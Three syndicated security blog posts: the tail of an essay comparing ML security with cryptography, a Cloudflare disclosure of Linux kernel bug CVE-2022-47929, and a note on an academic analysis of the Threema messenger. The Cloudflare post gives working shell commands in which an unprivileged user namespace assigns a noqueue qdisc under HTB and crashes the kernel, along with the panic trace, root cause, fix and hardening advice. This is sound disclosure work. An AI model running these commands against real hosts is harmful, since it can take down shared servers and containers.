But while security is only as strong as the weakest link, this doesn’t mean we can ignore either cryptography or ML security. Here, our experience with cryptography can serve as a guide. Cryptographic attacks have different characteristics than software and network attacks, something largely shared with ML attacks. Cryptographic attacks can be passive. That is, attackers who can recover the plaintext from nothing other than the ciphertext can eavesdrop on the communications channel, collect all of the encrypted traffic, and decrypt it on their own systems at their own pace, perhaps in a giant server farm in Utah. This is bulk surveillance and can easily operate on this massive scale.

On the other hand, computer hacking has to be conducted one target computer at a time. Sure, you can develop tools that can be used again and again. But you still need the time and expertise to deploy those tools against your targets, and you have to do so individually. This means that any attacker has to prioritize. So while the NSA has the expertise necessary to hack into everyone’s computer, it doesn’t have the budget to do so. Most of us are simply too low on its priorities list to ever get hacked. And that’s the real point of strong cryptography: it forces attackers like the NSA to prioritize.

This analogy only goes so far. ML is not anywhere near as mathematically sound as cryptography. Right now, it is a sloppy misunderstood mess: hack after hack, kludge after kludge, built on top of each other with some data dependency thrown in. Directly attacking an ML system with a model inversion attack or a perturbation attack isn’t as passive as eavesdropping on an encrypted communications channel, but it’s using the ML system as intended, albeit for unintended purposes. It’s much safer than actively hacking the network and the computer that the ML system is running on. And while it doesn’t scale as well as cryptanalytic attacks can—and there likely will be a far greater variety of ML systems than encryption algorithms—it has the potential to scale better than one-at-a-time computer hacking does. So here again, good ML security denies attackers all of those attack vectors.

We’re still in the early days of studying ML security, and we don’t yet know the contours of ML security techniques. There are really smart people working on this and making impressive progress, and it’ll be years before we fully understand it. Attacks come easy, and defensive techniques are regularly broken soon after they’re made public. It was the same with cryptography in the 1990s, but eventually the science settled down as people better understood the interplay between attack and defense. So while Google, Amazon, Microsoft, and Tesla have all faced adversarial ML attacks on their production systems in the last three years, that’s not going to be the norm going forward.

All of this also means that our security for ML systems depends largely on the same conventional computer security techniques we’ve been using for decades. This includes writing vulnerability-free software, designing user interfaces that help resist social engineering, and building computer networks that aren’t full of holes. It’s the same risk-mitigation techniques that we’ve been living with for decades. That we’re still mediocre at it is cause for concern, with regard to both ML systems and computing in general.

I love cryptography and cryptanalysis. I love the elegance of the mathematics and the thrill of discovering a flaw—or even of reading and understanding a flaw that someone else discovered—in the mathematics. It feels like security in its purest form. Similarly, I am starting to love adversarial ML and ML security, and its tricks and techniques, for the same reasons.

I am not advocating that we stop developing new adversarial ML attacks. It teaches us about the systems being attacked and how they actually work. They are, in a sense, mechanisms for algorithmic understandability. Building secure ML systems is important research and something we in the security community should continue to do.

There is no such thing as a pure ML system. Every ML system is a hybrid of ML software and traditional software. And while ML systems bring new risks that we haven’t previously encountered, we need to recognize that the majority of attacks against these systems aren’t going to target the ML part. Security is only as strong as the weakest link. As bad as ML security is right now, it will improve as the science improves. And from then on, as in cryptography, the weakest link will be in the software surrounding the ML system.

This essay originally appeared in the May 2020 issue of IEEE Computer. I forgot to reprint it here.

CVE-2022-47929: traffic control noqueue no problem?

Post Syndicated from Frederick Lawler original https://blog.cloudflare.com/cve-2022-47929-traffic-control-noqueue-no-problem/

CVE-2022-47929: traffic control noqueue no problem?

CVE-2022-47929: traffic control noqueue no problem?

USER namespaces power the functionality of our favorite tools such as docker, podman, and kubernetes. We wrote about Linux namespaces back in June and explained them like this:

Most of the namespaces are uncontroversial, like the UTS namespace which allows the host system to hide its hostname and time. Others are complex but straightforward – NET and NS (mount) namespaces are known to be hard to wrap your head around. Finally, there is this very special, very curious USER namespace. USER namespace is special since it allows the – typically unprivileged owner to operate as “root” inside it. It’s a foundation to having tools like Docker to not operate as true root, and things like rootless containers.

Due to its nature, allowing unprivileged users access to USER namespace always carried a great security risk. With its help the unprivileged user can in fact run code that typically requires root. This code is often under-tested and buggy. Today we will look into one such case where USER namespaces are leveraged to exploit a kernel bug that can result in an unprivileged denial of service attack.

Enter Linux Traffic Control queue disciplines

In 2019, we were exploring leveraging Linux Traffic Control’s queue discipline (qdisc) to schedule packets for one of our services with the Hierarchy Token Bucket (HTB) classful qdisc strategy. Linux Traffic Control is a user-configured system to schedule and filter network packets. Queue disciplines are the strategies in which packets are scheduled. In particular, we wanted to filter and schedule certain packets from an interface, and drop others into the noqueue qdisc.

noqueue is a special case qdisc, such that packets are supposed to be dropped when scheduled into it. In practice, this is not the case. Linux handles noqueue such that packets are passed through and not dropped (for the most part). The documentation states as much. It also states that “It is not possible to assign the noqueue queuing discipline to physical devices or classes.” So what happens when we assign noqueue to a class?

Let’s write some shell commands to show the problem in action:

1. $ sudo -i
2. # dev=enp0s5
3. # tc qdisc replace dev $dev root handle 1: htb default 1
4. # tc class add dev $dev parent 1: classid 1:1 htb rate 10mbit
5. # tc qdisc add dev $dev parent 1:1 handle 10: noqueue

  1. First we need to log in as root because that gives us CAP_NET_ADMIN to be able to configure traffic control.
  2. We then assign a network interface to a variable. These can be found with ip a. Virtual interfaces can be located by calling ls /sys/devices/virtual/net. These will match with the output from ip a.
  3. Our interface is currently assigned to the pfifo_fast qdisc, so we replace it with the HTB classful qdisc and assign it the handle of 1:. We can think of this as the root node in a tree. The “default 1” configures this such that unclassified traffic will be routed directly through this qdisc which falls back to pfifo_fast queuing. (more on this later)
  4. Next we add a class to our root qdisc 1:, assign it to the first leaf node 1 of root 1: 1:1, and give it some reasonable configuration defaults.
  5. Lastly, we add the noqueue qdisc to our first leaf node in the hierarchy: 1:1. This effectively means traffic routed here will be scheduled to noqueue

Assuming our setup executed without a hitch, we will receive something similar to this kernel panic:

BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor instruction fetch in kernel mode
...
Call Trace:
<TASK>
htb_enqueue+0x1c8/0x370
dev_qdisc_enqueue+0x15/0x90
__dev_queue_xmit+0x798/0xd00
...
</TASK>

We know that the root user is responsible for setting qdisc on interfaces, so if root can crash the kernel, so what? We just do not apply noqueue qdisc to a class id of a HTB qdisc:

# dev=enp0s5
# tc qdisc replace dev $dev root handle 1: htb default 1
# tc class add dev $dev parent 1: classid 1:2 htb rate 10mbit // A
// B is missing, so anything not filtered into 1:2 will be pfifio_fast

Here, we leveraged the default case of HTB where we assign a class id 1:2 to be rate-limited (A), and implicitly did not set a qdisc to another class such as id 1:1 (B). Packets queued to (A) will be filtered to HTB_DIRECT and packets queued to (B) will be filtered into pfifo_fast.

Because we were not familiar with this part of the codebase, we notified the mailing lists and created a ticket. The bug did not seem all that important to us at that time.

Fast-forward to 2022, we are pushing USER namespace creation hardening. We extended the Linux LSM framework with a new LSM hook: userns_create to leverage eBPF LSM for our protections, and encourage others to do so as well. Recently while combing our ticket backlog, we rethought this bug. We asked ourselves, “can we leverage USER namespaces to trigger the bug?” and the short answer is yes!

Demonstrating the bug

The exploit can be performed with any classful qdisc that assumes a struct Qdisc.enqueue function to not be NULL (more on this later), but in this case, we are demonstrating just with HTB.

$ unshare -rU –net
$ dev=lo
$ tc qdisc replace dev $dev root handle 1: htb default 1
$ tc class add dev $dev parent 1: classid 1:1 htb rate 10mbit
$ tc qdisc add dev $dev parent 1:1 handle 10: noqueue
$ ping -I $dev -w 1 -c 1 1.1.1.1

We use the “lo” interface to demonstrate that this bug is triggerable with a virtual interface. This is important for containers because they are fed virtual interfaces most of the time, and not the physical interface. Because of that, we can use a container to crash the host as an unprivileged user, and thus perform a denial of service attack.

Why does that work?

To understand the problem a bit better, we need to look back to the original patch series, but specifically this commit that introduced the bug. Before this series, achieving noqueue on interfaces relied on a hack that would set a device qdisc to noqueue if the device had a tx_queue_len = 0. The commit d66d6c3152e8 (“net: sched: register noqueue qdisc”) circumvents this by explicitly allowing noqueue to be added with the tc command without needing to get around that limitation.

The way the kernel checks for whether we are in a noqueue case or not, is to simply check if a qdisc has a NULL enqueue() function. Recall from earlier that noqueue does not necessarily drop packets in practice? After that check in the fail case, the following logic handles the noqueue functionality. In order to fail the check, the author had to cheat a reassignment from noop_enqueue() to NULL by making enqueue = NULL in the init which is called way after register_qdisc() during runtime.

Here is where classful qdiscs come into play. The check for an enqueue function is no longer NULL. In this call path, it is now set to HTB (in our example) and is thus allowed to enqueue the struct skb to a queue by making a call to the function htb_enqueue(). Once in there, HTB performs a lookup to pull in a qdisc assigned to a leaf node, and eventually attempts to queue the struct skb to the chosen qdisc which ultimately reaches this function:

include/net/sch_generic.h

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
				struct sk_buff **to_free)
{
	qdisc_calculate_pkt_len(skb, sch);
	return sch->enqueue(skb, sch, to_free); // sch->enqueue == NULL
}

We can see that the enqueueing process is fairly agnostic from physical/virtual interfaces. The permissions and validation checks are done when adding a queue to an interface, which is why the classful qdics assume the queue to not be NULL. This knowledge leads us to a few solutions to consider.

Solutions

We had a few solutions ranging from what we thought was best to worst:

  1. Follow tc-noqueue documentation and do not allow noqueue to be assigned to a classful qdisc
  2. Instead of checking for NULL, check for struct noqueue_qdisc_ops, and reset noqueue to back to noop_enqueue
  3. For each classful qdisc, check for NULL and fallback

While we ultimately went for the first option: “disallow noqueue for qdisc classes”, the third option creates a lot of churn in the code, and does not solve the problem completely. Future qdiscs implementations could forget that important check as well as the maintainers. However, the reason for passing on the second option is a bit more interesting.

The reason we did not follow that approach is because we need to first answer these questions:

Why not allow noqueue for classful qdiscs?

This contradicts the documentation. The documentation does have some precedent for not being totally followed in practice, but we will need to update that to reflect the current state. This is fine to do, but does not address the behavior change problem other than remove the NULL dereference bug.

What behavior changes if we do allow noqueue for qdiscs?

This is harder to answer because we need to determine what that behavior should be. Currently, when noqueue is applied as the root qdisc for an interface, the path is to essentially allow packets to be processed. Claiming a fallback for classes is a different matter. They may each have their own fallback rules, and how do we know what is the right fallback? Sometimes in HTB the fallback is pass-through with HTB_DIRECT, sometimes it is pfifo_fast. What about the other classes? Perhaps instead we should fall back to the default noqueue behavior as it is for root qdiscs?

We felt that going down this route would only add confusion and additional complexity to queuing. We could also make an argument that such a change could be considered a feature addition and not necessarily a bug fix. Suffice it to say, adhering to the current documentation seems to be the more appealing approach to prevent the vulnerability now, while something else can be worked out later.

Takeaways

First and foremost, apply this patch as soon as possible. And consider hardening USER namespaces on your systems by setting sysctl -w kernel.unprivileged_userns_clone=0, which only lets root create USER namespaces in Debian kernels, sysctl -w user.max_user_namespaces=[number] for a process hierarchy, or consider backporting these two patches: security_create_user_ns() and the SELinux implementation  (now in Linux 6.1.x) to allow you to protect your systems with either eBPF or SELinux. If you are sure you’re not using USER namespaces and in extreme cases, you might consider turning the feature off with CONFIG_USERNS=n. This is just one example of many where namespaces are leveraged to perform an attack, and more are surely to crop up in varying levels of severity in the future.

Special thanks to Ignat Korchagin and Jakub Sitnicki for code reviews and helping demonstrate the bug in practice.

Security Analysis of Threema

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/01/security-analysis-of-threema.html

A group of Swiss researchers have published an impressive security analysis of Threema.

We provide an extensive cryptographic analysis of Threema, a Swiss-based encrypted messaging application with more than 10 million users and 7000 corporate customers. We present seven different attacks against the protocol in three different threat models. As one example, we present a cross-protocol attack which breaks authentication in Threema and which exploits the lack of proper key separation between different sub-protocols. As another, we demonstrate a compression-based side-channel attack that recovers users’ long-term private keys through observation of the size of Threema encrypted back-ups. We discuss remediations for our attacks and draw three wider lessons for developers of secure protocols.

From a news article:

Threema has more than 10 million users, which include the Swiss government, the Swiss army, German Chancellor Olaf Scholz, and other politicians in that country. Threema developers advertise it as a more secure alternative to Meta’s WhatsApp messenger. It’s among the top Android apps for a fee-based category in Switzerland, Germany, Austria, Canada, and Australia. The app uses a custom-designed encryption protocol in contravention of established cryptographic norms.

The company is performing the usual denials and deflections:

In a web post, Threema officials said the vulnerabilities applied to an old protocol that’s no longer in use. It also said the researchers were overselling their findings.

“While some of the findings presented in the paper may be interesting from a theoretical standpoint, none of them ever had any considerable real-world impact,” the post stated. “Most assume extensive and unrealistic prerequisites that would have far greater consequences than the respective finding itself.”

Left out of the statement is that the protocol the researchers analyzed is old because they disclosed the vulnerabilities to Threema, and Threema updated it.